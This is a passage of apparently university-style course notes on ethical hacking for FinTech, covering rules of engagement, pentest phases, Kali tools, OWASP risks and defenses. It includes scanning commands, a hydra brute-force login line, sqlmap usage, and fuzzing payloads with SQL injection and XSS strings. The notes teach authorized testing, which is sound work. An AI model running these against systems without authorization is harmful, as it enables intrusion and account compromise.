### üõ†Ô∏è How to Run in Spyder:

1. Open Spyder.
2. Create a new Python file (e.g., `port_scanner.py`).
3. Copy and paste the above code.
4. Run the script (`F5` or the green play button).
5. Enter the target domain/IP and port range when prompted.

---

### ‚ö†Ô∏è Note:

* Only scan systems you **own or have permission** to test.
* Open ports ‚â† vulnerable ports ‚Äî always use tools responsibly.

---



---

# üìÖ **Week 10 ‚Äî Ethical Hacking & Pentesting (Kali Linux Intro + Vulnerability Analysis for FinTech)**

üîê *Exploring how ethical hackers assess vulnerabilities, with a special focus on financial technologies.*

---

## üéØ **1. Course Introduction & Learning Objectives**

---

### ‚úÖ **1.1 Goals and Outcomes**

**üìù Learning Goals:**

* Understand the **fundamentals of ethical hacking**.
* Distinguish between **ethical hacking**, **penetration testing**, and **vulnerability assessments**.
* Learn **FinTech-specific security risks** and how to analyze them.
* Understand the **legal boundaries and compliance** required during assessments.

**üìå By the end of this module, students will be able to:**

* Define different security testing approaches.
* Identify key ethical and legal principles in cybersecurity.
* Conduct basic assessments using Kali Linux and relevant tools.
* Evaluate vulnerabilities from a FinTech industry lens.

---

### üß† **1.2 Ethical Hacking vs. Penetration Testing vs. Vulnerability Assessment**

| Term                                  | Definition                                                                                | Focus                                              |
| ------------------------------------- | ----------------------------------------------------------------------------------------- | -------------------------------------------------- |
| **Ethical Hacking** üßë‚Äçüíª             | Authorized attempt to **bypass system security** to identify vulnerabilities.             | Broad skillset across networks, systems, and apps. |
| **Penetration Testing (Pentest)** üïµÔ∏è | Simulated cyberattack to **test system defenses**. Usually project-based.                 | Exploitation and proof of weakness.                |
| **Vulnerability Assessment** üîé       | Systematic scan to **identify known vulnerabilities**. Doesn‚Äôt involve real exploitation. | Detection and reporting.                           |

üìå **Key Differences:**

* Ethical hacking is an **umbrella term**.
* Penetration testing involves **exploitation**, while vulnerability assessment is **non-intrusive**.

---

### üí∞ **1.3 FinTech-Specific Scope and Motivations**

**Why is this important in FinTech?**
FinTech platforms deal with:

* üí≥ **Payments**, üè¶ **Banking APIs**, üîê **User credentials**, and ü§ù **Sensitive data sharing**.
* FinTech is a **prime target** for attacks like fraud, phishing, and API abuse.

**Common FinTech Risks Include:**

* üßë‚Äçüíª API Abuse (e.g., unauthorized transfers)
* üîê Weak authentication mechanisms
* üï∏Ô∏è Lack of web app security (e.g., XSS, SQLi)
* üì± Mobile app vulnerabilities
* üí¨ Social engineering attacks on users

---

### ‚öñÔ∏è **1.4 Legal, Regulatory & Compliance Context**

Ethical hacking is **only legal when authorized** and must follow strict laws and standards.

**üõ°Ô∏è Key Terms to Know:**

* **Authorization** ‚úÖ: Always get written permission before testing.
* **Scope** üìú: Define what can and cannot be tested.
* **Compliance Laws**:

  * **GDPR** (EU): Data privacy
  * **PCIDSS**: Payment card security
  * **SBP regulations (Pakistan)**: Banking systems
  * **SOC 2, ISO 27001**: InfoSec audit standards

üìå **Never hack without legal backing** ‚Äî Even if your intentions are good!

---






---

# ‚úÖ 2. Rules of Engagement & Ethics ‚öñÔ∏è

> The **Rules of Engagement (RoE)** are the written agreement that say *what* you may test, *how* you may test it, and *who* to call if something goes wrong. They protect both the testers and the organization.

---

## ‚úçÔ∏è 2.1 Written Authorization & Scope Definition

**What is written authorization?**
A signed document (email or PDF) from the organization that *explicitly* gives permission to test specified assets. Without it, testing is illegal.

**Minimum items RoE must include:**

* **Authorizing party** ‚Äî name, role, contact information, and signature. üßë‚Äçüíº
* **Scope** ‚Äî exact IP addresses, hostnames, URLs, or mobile apps that are allowed for testing. üó∫Ô∏è
* **Out-of-scope systems** ‚Äî explicitly list systems NOT to touch (production payment gateway, customer databases, etc.). üö´
* **Time window** ‚Äî start/end date and times (include timezone). ‚è∞
* **Allowed techniques** ‚Äî e.g., passive recon, active scans, exploitation (lab only), social engineering (if authorized). üîß
* **Data handling rules** ‚Äî what to do with any sensitive data accidentally found. üîí

**Copyable RoE clause (short):**

> ‚ÄúCompany Authorizes Lab Team to perform non-destructive testing on `test-api.finbank.local` (10.0.2.5) between 2025-11-01 09:00‚Äì13:00 UTC. Production payment gateway (`prod.pay.finbank.com`) is out of scope. All test artifacts must be stored encrypted and deleted after the engagement.‚Äù

---

## ‚è±Ô∏è 2.2 Time Windows, Allowed Techniques, Excluded Systems

**Time windows ‚Äî why they matter**

* Avoid testing during business-critical hours to reduce risk of disruption.
* Ensure on-call staff are available during the test window.

**Common Allowed Techniques (examples)**

* ‚úÖ Passive reconnaissance (OSINT, public records)
* ‚úÖ Non-intrusive scanning (rate-limited `nmap`)
* ‚úÖ Web application testing behind a proxy (Burp)
* ‚úÖ Exploitation **only** in isolated lab VMs or with explicit approval

**Common Disallowed Techniques (unless explicitly allowed)**

* ‚ùå Denial-of-Service attacks
* ‚ùå Social engineering of real customers or staff (unless planned)
* ‚ùå Any action that modifies or deletes live customer data

**Example exclusion list**

* Production payment processing URLs
* Live customer databases and backup servers
* Regulatory reporting systems

---

## üìû 2.3 Communication, Escalation & Emergency Contacts

**Why communication matters**
Quick, agreed communication prevents panic, helps fix issues rapidly, and documents what happened.

**Minimum contact list in RoE**

* **Primary POC (Day-to-day)** ‚Äî Name, phone, email. üì±
* **Emergency Contact (Immediate outage)** ‚Äî Phone number (24/7 if possible). üö®
* **Security Lead / Incident Response** ‚Äî Who to notify if you find a breach. üõ°Ô∏è

**Simple escalation steps (copyable):**

1. If you observe an outage or suspected data leak ‚Üí **stop testing immediately**.
2. Call the **Emergency Contact** right away.
3. Preserve evidence (do not alter logs; save pcap, screenshots).
4. Email the **Primary POC** and Security Lead with the description of the issue and actions taken.

**Status updates**

* Agree a cadence (e.g., hourly during high-risk tests; end-of-day for low-risk scans).

---

## üîê 2.4 Data Handling, Privacy & Non‚ÄëDisclosure

**Principles to follow**

* **Minimize data access** ‚Äî Do not collect production customer data unless strictly necessary and authorized.
* **Encrypt stored artifacts** ‚Äî Use password-protected or encrypted storage for any logs, screenshots, or pcaps. üîí
* **Limit retention** ‚Äî Delete sensitive artifacts once the engagement and required reporting are complete, unless otherwise authorized. üóëÔ∏è
* **Report accidental data exposure immediately** ‚Äî Follow escalation steps in the RoE.

**How to store artifacts (recommended)**

* Use encrypted zip files (e.g., `zip -e artifacts.zip capture.pcap`) or an encrypted cloud bucket with restricted access.
* Keep a short chain-of-custody note: who accessed it, when, and why.

**Non‚ÄëDisclosure Agreements (NDA)**

* An NDA or confidentiality clause should be signed by testers and stakeholders.
* The NDA should state who can receive the final report and how it will be shared.

---

## üßæ Example Templates & Snippets (Copy + Edit)

**A. Short RoE template paragraph**

> *Authorizing Organization:* `ACME FinTech Ltd`
> *Authorized Tester(s):* `RedTeam Co.` ‚Äî `alice@redteam.example.com`
> *Scope:* `test-api.acme.local (10.10.0.5)`, `web.lab.acme.local (10.10.0.6)`
> *Out-of-scope:* `prod.pay.acme.com`, `db-prod.acme.com`
> *Time Window:* `2025-11-05 09:00‚Äì13:00 UTC`
> *Allowed Techniques:* passive reconnaissance, authenticated web testing with provided test accounts.
> *Emergency Contact:* `ops-lead@acme.com / +1-555-0100`
> *Data Handling:* All artifacts encrypted at rest; deletion within 7 days post-reporting.

**B. Emergency notification template**

- *Subject:* [URGENT] Test outage detected ‚Äî `lab-api.acme.local`
- *Body:* During scheduled testing at `11:32 UTC`, a service disruption was observed on `lab-api.acme.local`. Testing paused and evidence preserved. Contacted emergency POC at +1-555-0100. Awaiting next steps.

---

## ‚úÖ Quick Student Checklist (copy into your lab notes)

* [ ] I have a signed RoE for the target.
* [ ] I understand what is **in scope** and **out of scope**.
* [ ] I have emergency contact details and escalation steps.
* [ ] I will store artifacts encrypted and delete them after the engagement.
* [ ] I will stop testing immediately on suspected outages or data leaks.

---

## üß† Short Reminder for Students (Plain English)

* **Don‚Äôt guess** if something is allowed ‚Äî check the RoE.
* **If in doubt, stop** and call the POC.
* **Always assume customer data is sensitive** ‚Äî treat it carefully.
* **Documentation is part of testing** ‚Äî record everything you do.

---




---

# 3. Pentest Methodology (Phases) üîÅ

> Think of a penetration test like a **safety inspection** for a building: you first look around (recon), check doors and windows (scanning), try to open weak locks (exploitation ‚Äî safely, in a lab), then report what to fix.

The goal is to **find problems before bad actors do**.

---

## 3.1 Reconnaissance ‚Äî Passive and Active üïµÔ∏è‚Äç‚ôÄÔ∏è

**Definition:**
Reconnaissance means *gathering information* about the target before touching anything. It answers: *What exists? Where is it? Who owns it?*

**Two types:**

* **Passive reconnaissance** ‚Äî Collect public information without interacting with the target directly (e.g., search engines, public certificate logs, social media).

  * *Analogy:* Looking at a building from the street, reading the signboard.
  * **Tools/techniques:** `whois`, Google dorks, `crt.sh`, public GitHub, company website, job postings.
* **Active reconnaissance** ‚Äî Interact with the target to discover more (e.g., DNS lookups, simple network queries).

  * *Analogy:* Walking up to the building and peeking at the door numbers (non-destructive).
  * **Tools/techniques:** `dig`, `nslookup`, `theHarvester`.

**Outcome:** A list of assets - domains, subdomains, IP ranges, exposed services, possible employee names to avoid social engineering mistakes.

**Ethics tip:** Passive recon is lower risk; active recon should be done only if permitted in the RoE.

---

## 3.2 Scanning and Enumeration üîé

**Definition:**
Scanning finds *which hosts and ports* are reachable. Enumeration is digging deeper into those services to learn *what versions and features* they run.

**What you do here:**

* Find which machines are online (host discovery).
* Find which ports are open (port scanning).
* Identify services (web servers, SSH, databases) and version numbers (service fingerprinting).
* Enumerate user lists, directories, API endpoints, and more.

**Tools & commands (simple examples):**

* `nmap` ‚Äî port and service scans (e.g., `nmap -sS -sV target`)
* `masscan` ‚Äî super-fast port discovery (lab-only)
* `curl` / `http` ‚Äî fetch web pages and headers
* `dirb` / `gobuster` ‚Äî find hidden directories and files on web servers

**Outcome:** An inventory of reachable services and probable weak points to investigate.

**Safety note:** Use rate limits and avoid aggressive scans on production systems.

---

## 3.3 Vulnerability Analysis and Prioritization üß≠

**Definition:**
Take the scan results and determine *which findings are real problems* and *which ones matter most* to the organization.

**Steps:**

1. **Map findings to vulnerability databases** (CVE, vendor advisories).
2. **Assess impact** ‚Äî which findings could leak funds, expose PII, or break transaction integrity?
3. **Estimate likelihood** ‚Äî how easy is it to exploit?
4. **Prioritize** ‚Äî combine impact and likelihood into High / Medium / Low.

**Simple prioritization rule:**

* **High** = easy to exploit + impacts money or customer data
* **Medium** = exploitable with effort or impacts internal systems
* **Low** = informational or requires unrealistic conditions

**Tools/inputs:** Nmap scripts (NSE), vulnerability scanners (OpenVAS, Nessus) ‚Äî interpret their reports rather than blindly trusting scores.

**Outcome:** A focused list of issues to test further and eventually include in the report.

---

## 3.4 Exploitation (Controlled, Lab‚ÄëOnly) ‚ö†Ô∏è

**Definition:**
Exploitation means *attempting to use* a vulnerability to prove the impact (e.g., obtaining a shell, bypassing auth). This phase must be performed **only** in isolated lab environments or with explicit permission.

**Why we exploit (carefully):**

* Proving a vulnerability reduces false positives and shows real risk to stakeholders.
* Demonstrates business impact (e.g., ‚ÄúI could transfer funds without authorization‚Äù).

**Examples of safe exploitation:**

* Exploit a vulnerable test VM (Metasploitable, OWASP Juice Shop).
* Use Metasploit modules against isolated targets (with snapshots).
* Perform a controlled SQL injection that reads a test table (not production).

**Tools & frameworks:**

* `Metasploit` (msfconsole) for modular exploits
* `sqlmap` for SQL injection proof-of-concept (use with care)
* Custom PoC scripts in controlled labs

**Critical safety rules:**

* Always have a VM snapshot to revert.
* Never modify or delete real customer data.
* Stop immediately if you affect production behavior.

**Outcome:** Evidence of exploitability (screenshots, logs, non-destructive PoC).

---

## 3.5 Post‚ÄëExploitation and Cleanup üßπ

**Definition:**
After successful exploitation in a lab, this phase is about *what an attacker could do next* and then returning the environment to its prior state.

**Typical post-exploitation goals to analyze (conceptually):**

* **Data access:** Could the attacker read sensitive records?
* **Lateral movement:** Can they reach other systems from the compromised host?
* **Persistence:** Can the attacker maintain access over time? (In lab only; do not deploy persistence in real environments.)

**Cleanup checklist (always do this):**

* Remove any files/scripts you uploaded.
* Restore VM from snapshot (preferred).
* Clear logs you created only if instructed by RoE (but keep copies for reporting).
* Document the exact steps you took.

**Outcome:** A safe, clean lab environment and documentation of potential attacker paths.

---

## 3.6 Reporting and Retesting üìù

**Definition:**
Turn your technical findings into **clear, action-oriented reports** that operations and engineering teams can use.

**Report structure (simple):**

1. **Executive summary:** One-paragraph overview of the highest risks and recommended next steps.
2. **Technical findings:** For each issue include: title, severity, affected assets, steps to reproduce (PoC), evidence (screenshots, pcap snippets), impact, and remediation.
3. **Remediation recommendations:** Concrete steps, estimated effort, and suggested validation tests.
4. **Appendix / Artifacts:** Raw outputs, scan files, and command history.

**Retesting:** After fixes are applied, rerun the relevant tests to confirm remediation (and document retest results).

**Communication tip:** Use non-technical language in the executive summary ‚Äî executives want impact and recommended next actions, not raw commands.

**Outcome:** Actionable remediation plan and validated fixes.

---

## üìö Quick Tools Map (phase ‚Üí common tools)

* **Reconnaissance:** `whois`, `theHarvester`, `crt.sh`
* **Scanning & Enumeration:** `nmap`, `masscan`, `gobuster`, `curl`
* **Vuln Analysis:** `OpenVAS`, `Nessus` (conceptual), `nmap --script`
* **Exploitation:** `Metasploit`, `sqlmap`, PoC scripts (lab-only)
* **Post‚ÄëExploitation:** `netcat`, `ssh`, analysis scripts (lab-only)
* **Reporting:** save `nmap` XML, screenshots, pcaps; compile into report

---






---

# 4. üê±‚Äçüíª Kali Linux Introduction & Tools for FinTech Pentesting

Kali Linux is a **specialized operating system** used by ethical hackers and security professionals. It‚Äôs packed with tools used for scanning, exploiting, sniffing, and reporting vulnerabilities ‚Äî all in one place.

Think of Kali Linux as the **Swiss Army Knife** üõ†Ô∏è for cybersecurity work!

---

## 4.1 What is Kali Linux? üêß

**Definition:**
Kali Linux is a **Debian-based Linux distribution** built specifically for **penetration testing**, **digital forensics**, and **security auditing**.

It‚Äôs maintained by **Offensive Security** and comes pre-installed with 600+ tools like Nmap, Wireshark, Metasploit, Burp Suite, and more.

**Why it's used in cybersecurity:**

* Ready-to-go hacking tools
* Lightweight and can run in a virtual machine
* Free and open-source
* Updated frequently with new exploits and testing tools

**Usage modes:**

* Live boot from USB üíΩ
* Installed directly on system üíª
* Run inside VirtualBox or VMware (most common for labs) üß™

---

## 4.2 Key Tools in Kali Linux üîß

Here's a list of essential Kali tools you‚Äôll likely use in FinTech-focused ethical hacking labs and why they matter:

| Tool Name      | Use Case üíº                                   | Common Command or UI                          |
| -------------- | --------------------------------------------- | --------------------------------------------- |
| `nmap`         | Port scanning and service detection           | `nmap -sS -sV target.com`                     |
| `Wireshark`    | Packet sniffing and network protocol analysis | GUI-based (filter: `http`)                    |
| `Burp Suite`   | Web vulnerability testing and interception    | GUI-based proxy tool                          |
| `sqlmap`       | Automated SQL injection discovery             | `sqlmap -u "URL" --batch`                     |
| `hydra`        | Brute-force login credentials                 | `hydra -l admin -P passlist.txt ftp://target` |
| `metasploit`   | Exploitation framework with 1000s of modules  | `msfconsole`                                  |
| `theHarvester` | Email/subdomain/employee OSINT collection     | `theHarvester -d example.com -b google`       |
| `nikto`        | Web server scanner for known vulnerabilities  | `nikto -h http://target.com`                  |

---

## 4.3 Why Use Kali for FinTech Testing? üí∞

**FinTech systems** deal with:

* üßæ Personal and financial data (PII, account info)
* üí∏ Transactions (e.g., online banking, stock trades)
* üîê Strong compliance standards (PCI-DSS, GDPR)

Using Kali Linux, we can:

* Scan APIs for misconfigurations or outdated TLS üîì
* Check login forms for brute-force protections (rate limiting, CAPTCHAs)
* Analyze exposed metadata from banking websites
* Simulate phishing sites for security awareness

**Example Scenario:**
A payment gateway exposes a forgotten subdomain `admin.old-payments.finbank.com`. You use Kali tools to:

1. Discover the subdomain using `theHarvester`
2. Scan open ports with `nmap`
3. Try test logins (in a lab) using `hydra`
4. Check for known web server CVEs with `nikto`

---

## 4.4 How to Install and Use Kali üñ•Ô∏è

**‚úÖ Option 1: VirtualBox/VMware (Recommended for students)**

* Download Kali ISO from [https://www.kali.org](https://www.kali.org)
* Set up a VM with at least 2 GB RAM
* Run Kali inside your Windows/Mac/Linux OS safely

**‚úÖ Option 2: Bootable USB**

* Create a Kali bootable USB using tools like Rufus
* Use on live machines without installing

**‚úÖ Option 3: Kali on WSL (Windows Subsystem for Linux)**

* For advanced users, install on Windows via Microsoft Store

---

## üß† Quick Summary

| Feature                         | Benefit for Students                          |
| ------------------------------- | --------------------------------------------- |
| üíª Preinstalled tools           | No need to install everything yourself        |
| üîí Real-world attack simulation | Practice ethical hacking in safe labs         |
| üîÅ Regular updates              | Stay current with security trends             |
| üí∞ FinTech focus possible       | Customize tools for financial security checks |

---

## ‚ö†Ô∏è Final Note: Use Kali Responsibly

* Never run offensive tools on unauthorized systems.
* Always get **written permission** before testing any real-world website or service.
* Use **isolated lab environments** to learn and experiment.

---





---

## üß® Common Vulnerabilities in FinTech Platforms

FinTech platforms, like mobile banking apps, payment gateways, and digital wallets, deal with **very sensitive data** and **real money üí∞**. That‚Äôs why they are top targets for hackers.

Let‚Äôs explore the **most common weaknesses** that attackers exploit in FinTech systems.

---

### üîü 5.1 OWASP Top 10 in FinTech Context

**OWASP** stands for **Open Web Application Security Project**, it's a global initiative that publishes the **Top 10 most critical security risks** in web applications.

üîê **FinTech platforms must take these very seriously** because:

* They handle **payments**, **personal info**, and **authentication**.
* A single vulnerability can cause **millions in losses** or **regulatory fines**.

Here‚Äôs a simplified view of the **OWASP Top 10 (2021)** and how each applies to FinTech:

| üî¢  | OWASP Risk                             | FinTech Impact üí≥                                  |
| --- | -------------------------------------- | -------------------------------------------------- |
| 1Ô∏è‚É£ | Broken Access Control                  | Unauthorized access to accounts or money transfers |
| 2Ô∏è‚É£ | Cryptographic Failures                 | Poor encryption = exposed card info or passwords   |
| 3Ô∏è‚É£ | Injection (SQL, etc.)                  | Hackers stealing or modifying account data         |
| 4Ô∏è‚É£ | Insecure Design                        | Poor logic (e.g., no rate limits) leads to abuse   |
| 5Ô∏è‚É£ | Security Misconfiguration              | Default passwords or unnecessary open ports        |
| 6Ô∏è‚É£ | Vulnerable & Outdated Components       | Using old libraries with known exploits            |
| 7Ô∏è‚É£ | Identification & Auth Failures         | Login bypass or session hijacking                  |
| 8Ô∏è‚É£ | Software & Data Integrity Failures     | Tampered updates or fake app injections            |
| 9Ô∏è‚É£ | Security Logging & Monitoring Failures | No alerts when a fraud attack happens              |
| üîü  | Server-Side Request Forgery (SSRF)     | FinTech APIs fetching malicious attacker links     |

---

### üîë 5.2 Broken Authentication

**Definition:**
Broken authentication means **any weakness in the login or session system** that lets attackers impersonate users.

üîì **Common issues in FinTech:**

* Weak passwords or no complexity rules
* No multi-factor authentication (MFA)
* Session tokens stored insecurely (like in URLs or local storage)
* Allowing unlimited login attempts (brute force attacks)

üß™ **Example Attack:**
An attacker tries thousands of passwords on a FinTech login page and finally gets access because **rate limiting wasn't enforced**.

üõ°Ô∏è **Fixes:**

* Enforce strong password policies
* Use MFA (SMS, app, biometrics)
* Implement login attempt lockout
* Store session tokens securely (HTTPOnly cookies)

---

### üß¨ 5.3 Sensitive Data Exposure

**Definition:**
This means **leaking personal or financial data** (even accidentally) like:

* üîê Passwords
* üí≥ Credit card numbers
* üÜî CNIC, SSN, phone, address
* üìà Transaction history

‚ùå **Where FinTech fails:**

* Not using **HTTPS**
* Storing data in plain text (no encryption)
* Leaky APIs that return too much data
* Logs that include passwords or card info

üß™ **Example:**
A mobile wallet stores passwords **unencrypted** in its internal database. Malware can steal it easily.

üõ°Ô∏è **Fixes:**

* Use **TLS/SSL** (HTTPS) for all communications
* Encrypt data at rest and in transit
* Mask data in logs or UI (`****1234`)
* Follow **data minimization** only store what‚Äôs needed

---

### üîå 5.4 Insecure APIs

**Definition:**
APIs (Application Programming Interfaces) connect FinTech apps to servers, banks, etc. Insecure APIs are like **doors left open** for attackers.

üö™ **Common problems:**

* No authentication required
* Returning too much data (overexposure)
* Not validating input (SQL injection risk)
* No rate limiting = **abuse**

üß™ **Example:**
A FinTech app‚Äôs API allows `GET /users?id=1` and returns **all personal info**, without checking who‚Äôs making the request.

üõ°Ô∏è **Fixes:**

* Use OAuth2 / token-based authentication
* Apply strict input/output validation
* Limit response fields to essentials
* Apply rate limits and IP blocks

---

### üìâ 5.5 Real FinTech Breaches and Causes

Here are a few **real-world FinTech incidents** that show what happens when these vulnerabilities are not fixed:

#### üîê Robinhood (2021)

* **What happened:** Social engineering + broken access control
* **Result:** Data breach of 7 million users
* **Lesson:** Need strict internal access protocols + MFA for support agents

#### üí≥ Dave App (2020)

* **What happened:** Database leaked due to **exposed API key**
* **Result:** 7.5 million users' data leaked online
* **Lesson:** Secure all API keys and secrets, encrypt databases

#### üè¶ Capital One (2019)

* **What happened:** AWS misconfiguration + SSRF
* **Result:** 100 million user records stolen
* **Lesson:** Always test cloud configurations for leaks

---




# 6. Vulnerability Assessment in Action üîçüõ†Ô∏è

**(How to check systems for weaknesses ‚Äî simple, practical, and safe for lab use)**

> **Safety first:** Only run these commands against systems you own or have explicit written permission to test. Treat all instructions as **lab/teaching** examples. Never attack production or third‚Äëparty systems without authorization.

---

## 6.1 Port scanning (nmap) üåêüì°

**What is it?**
Port scanning discovers *which network ports* on a host are open and what services run there (web, ssh, database, etc.). Think of ports like doors on a building ‚Äî port scanning checks which doors are unlocked.

**Why it matters for FinTech:**
Open ports reveal services that could expose sensitive APIs, admin consoles, or outdated software that accepts connections.

**Common tool:** `nmap` (Network Mapper) ‚Äî powerful and widely used.

**Simple commands (run in Kali / local VM):**

* Quick service scan of common ports:

  ```bash
  nmap -sS -sV -p 1-1024 target.example.com
  ```

  * `-sS` = TCP SYN (stealth) scan
  * `-sV` = service/version detection
  * `-p 1-1024` = scan ports 1 through 1024

* Full port scan with default scripts (lab only / slower):

  ```bash
  sudo nmap -p- -sS -sV --script=vuln target.example.com
  ```

  * `-p-` = all ports (1‚Äì65535)
  * `--script=vuln` = run vulnerability-detection scripts (be careful; can be intrusive)

**How to read results (simple):**

* `PORT  STATE SERVICE VERSION`

  * `22/tcp open  ssh OpenSSH 8.2` ‚Üí SSH is running on port 22
* `filtered` or `closed` means the port is not reachable or blocked

**FinTech example:**
If port 5432 (PostgreSQL) is open on a public IP and not firewall protected, an attacker might try to connect to the database directly.

**Safety tips:**

* Use `-T1` or `-T2` timing templates for production-like networks (slower, quieter).
* Avoid `-A` or intrusive NSE scripts on production unless allowed in RoE.

---

## 6.2 Banner grabbing (netcat / curl) ü™ßüîé

**What is it?**
Banner grabbing means connecting to an open service to read the initial response (the ‚Äúbanner‚Äù) that often reveals software and version information.

**Why it matters for FinTech:**
Version info can show known vulnerable versions (e.g., old web server or TLS library).

**Tools:** `netcat (nc)`, `curl`, `telnet`

**Examples:**

* Grab HTTP headers (web server banner):

  ```bash
  curl -I http://target.example.com
  ```

  * `-I` returns response headers (Server, Date, Content-Type, etc.)

* Manual banner grab with netcat (connect then type):

  ```bash
  nc target.example.com 22
  ```

  * Many SSH servers immediately show the banner like `SSH-2.0-OpenSSH_7.4`

**How to use output:**
If banner shows `Apache/2.2.14` ‚Äî search for known CVEs for that version and prioritize patching.

**Safety tips:**

* Banner grabbing is low-risk, but if banner reveals sensitive info (like internal hostnames), report it as information disclosure.

---

## 6.3 Web scanning (nikto, Burp) üåçüîê

**What is it?**
Web scanning looks for common web server and application issues: outdated servers, misconfigured headers, default files, common vulnerabilities (like directory listing, exposed admin pages).

**Common tools:**

* `Nikto` ‚Äî quick server-level scanner for known issues
* `Burp Suite` ‚Äî interactive proxy for inspecting and manipulating web traffic (great for manual testing)
* `OWASP ZAP` ‚Äî alternative to Burp, can do active scans and spidering

**Commands / flows:**

* Nikto basic scan:

  ```bash
  nikto -h http://target.example.com
  ```
* Burp Suite workflow (GUI):

  1. Start Burp; set browser proxy to `127.0.0.1:8080`.
  2. Browse the site to capture requests.
  3. Use Scanner / Intruder (in paid Burp) or manual tests.

**What to look for in FinTech apps:**

* Missing security headers (HSTS, X-Frame-Options)
* Insecure cookies (no HttpOnly or Secure flags)
* Admin interfaces exposed to the internet
* Unprotected API endpoints returning sensitive fields

**Safety tips:**

* Nikto and active Burp scanning can be noisy‚Äîconfirm RoE and test in lab first.
* Use the browser+proxy method for controlled, manual testing.

---

## 6.4 API fuzzing (input testing) üîÅüß™

**What is it?**
API fuzzing sends many kinds of malformed or unexpected inputs to API endpoints to see how they behave ‚Äî crash, leak data, or accept unauthorized actions.

**Why for FinTech:**
APIs perform transactions and return sensitive data. Fuzzing can reveal authentication bypasses, input validation failures, or business logic problems (e.g., change amount field to negative).

**Tools & techniques:**

* **Burp Intruder** (manual/automated) ‚Äî send many payloads to a request parameter
* **OWASP ZAP Fuzzer** ‚Äî similar capability
* **fuzzing scripts** in Python using `requests` library for custom tests

**Simple patchwork example (conceptual Python pseudo-flow):**

```python
# Pseudocode concept ‚Äî DO NOT run against real targets
payloads = ["", " ' OR '1'='1", "<script>alert(1)</script>", "-1000"]
for p in payloads:
    r = requests.post("https://api.lab/transfer", json={"amount": p, "to":"acct2"})
    print(r.status_code, len(r.text))
```

* Look for unexpected status codes (500 internal error) or success when it should fail.

**Business-logic fuzzing ideas in FinTech:**

* Try negative amounts, zero amounts, very large amounts
* Swap recipient account IDs to test authorization checks (IDOR)
* Replay requests without nonce/timestamp to test replay protection

**Safety tips:**

* Use authenticated **test** accounts only.
* Rate-limit fuzzing to avoid accidental DoS.
* Coordinate with POC so monitoring teams expect traffic.

---

## 6.5 Reporting vulnerabilities (what to include) üßæ‚úÖ

**Why reporting matters:**
A vulnerability is only useful if the team can *understand and fix it*. Reports translate technical findings into actions.

**Short, actionable report structure (per finding):**

1. **Title** ‚Äî short but descriptive.

   * e.g., *‚ÄúInsecure direct object reference (IDOR) in /api/transfer‚Äù*

2. **Severity** ‚Äî High / Medium / Low (justify with impact + likelihood).

   * e.g., *High ‚Äî allows unauthorized transfers*

3. **Affected Asset(s)** ‚Äî URL/IP, environment (lab/dev/prod).

   * e.g., *[https://api.lab/transfer](https://api.lab/transfer) (staging environment)*

4. **Description** ‚Äî what you observed, in plain language.

   * e.g., *Changing the recipient account ID in the request allowed transferring funds from account A to account B without authorization.*

5. **Proof-of-Concept (PoC)** ‚Äî minimal steps & sample request/response.

   * Provide sanitized request/response (no real user data).

6. **Impact** ‚Äî what could an attacker do (money theft, PII leak, integrity loss).

   * e.g., *Confidentiality & Integrity: attacker can transfer funds.*

7. **Remediation recommendations** ‚Äî concrete steps the developers can implement.

   * e.g., *Server-side authorization check: verify token owner matches source account. Add transaction signing or two-step approval for large amounts.*

8. **Suggested Retest Criteria** ‚Äî how to verify the fix.

   * e.g., *Attempt the same PoC; request should be denied with 403.*

9. **Artifacts** ‚Äî attachments: nmap XML, screenshots, pcap slices (encrypted), command logs.

**Example short PoC snippet (sanitized):**

```
Request:
POST /api/transfer
Authorization: Bearer <TEST_TOKEN_A>
Body: {"from_account":"A","to_account":"B","amount":100}

Result:
200 OK ‚Äî transfer succeeded even though token belonged to Account A's owner in lab test.
```

**Delivery tips:**

* Include an **executive summary** highlighting top 2-3 critical issues in plain language.
* Use screenshots and short command outputs to support claims.
* Keep evidence minimal and sanitized (avoid real customer PII).

---

## ‚úÖ Quick Checklist before any active test

* [ ] Signed RoE authorizing scans and tests for the target.
* [ ] Use test or staging environment if available.
* [ ] Have emergency contacts available.
* [ ] Limit scan rate and follow agreed time windows.
* [ ] Encrypt and protect any artifacts collected.

---




---

# üõ°Ô∏è **Defense Mechanisms in FinTech**

**Objective:**
Understand the **proactive defenses** used in financial technology (FinTech) applications to prevent exploitation, detect threats, and ensure the security of users, transactions, and systems.

These are practical **security hygiene techniques** that every FinTech developer and architect should follow.

---

## 7.1 üßë‚Äçüíª Secure Coding Practices

**What is it?**
Writing code in a way that prevents security vulnerabilities from being introduced in the first place.

### üõ†Ô∏è Key Practices:

* **Input Validation:**
  Always validate and sanitize user input to prevent injections (SQL, XSS, etc.).

  > E.g., Don't trust user input like `DROP TABLE users;`

* **Parameterized Queries / Prepared Statements:**
  Prevent SQL injection by avoiding direct string concatenation in SQL queries.

* **Error Handling:**
  Don‚Äôt show full error stack traces to users ‚Äî they may leak internal details.

* **Use secure libraries & frameworks:**
  Avoid outdated or unmaintained packages.

* **Least Privilege Principle:**
  Every function or module should only access what it *absolutely needs*.

üìå **Example:**
Instead of:

```python
query = "SELECT * FROM users WHERE username='" + user_input + "'"
```

Use:

```python
query = "SELECT * FROM users WHERE username = ?"
cursor.execute(query, (user_input,))
```

---

## 7.2 üîê Multi-Factor Authentication (MFA)

**What is it?**
A security system that requires more than one method of authentication from independent categories of credentials.

> ‚úÖ Something you **know** (password)
> ‚úÖ Something you **have** (OTP app, SMS code, YubiKey)
> ‚úÖ Something you **are** (biometric like fingerprint or face)

### üîÑ Why MFA in FinTech?

* Passwords can be weak or reused.
* MFA **significantly reduces** the risk of unauthorized access even if the password is compromised.

### üõ†Ô∏è Examples:

* **OTP (One-Time Password):** via apps like Google Authenticator or SMS
* **Biometrics:** fingerprint or face recognition for mobile banking apps
* **Email-based verification links**

üìå **Pro tip:** Avoid SMS-based MFA where possible ‚Äî it's vulnerable to **SIM swapping**.

---

## 7.3 üìä Logging and Anomaly Detection

**What is it?**
Tracking user and system behavior through logs, and automatically detecting suspicious activity.

### üß© What to log:

* **Login attempts** (success/fail, source IP, timestamp)
* **API calls** (what was accessed, by whom)
* **Transaction activities**
* **Errors and exceptions**
* **Privilege changes (admin, user roles)**

### üß† Anomaly Detection:

Use **machine learning** or rules to flag:

* Login from new location or device
* Multiple failed logins in short time
* Unusual transfer patterns (amount, frequency, recipient)

üìå **Tools:**

* **SIEM (Security Information and Event Management)**: Splunk, Wazuh, Elastic SIEM
* **Anomaly Detection Models**: Isolation Forest, Autoencoders, etc.

---

## 7.4 üö´ Rate Limiting and Lockouts

